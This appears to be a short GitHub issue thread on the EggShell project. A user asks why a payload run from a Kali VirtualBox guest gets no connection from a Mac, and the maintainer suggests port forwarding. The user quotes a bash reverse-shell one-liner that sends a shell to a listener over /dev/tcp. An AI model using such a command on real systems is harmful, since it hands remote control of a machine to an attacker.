### ISSUE TITLE
Virtual Machine

### ISSUE THREAD

**Issue by mikk146m** [neoneggplant/EggShell#80]
I have problems when i run the EggShell on a virtual machine (VirtualBox), where i run Linux Kali.
When i run a payload on the Kali machine, and enter the bash (bash &> /dev/tcp/10.0.2.15/4444 0>&1) on my mac nothing happens.
Can you help me?

**Comment by neoneggplant** [comment]
you may have to forward some ports in virtualbox to allow it to be seen on your network, what is your local ip on your mac look like?
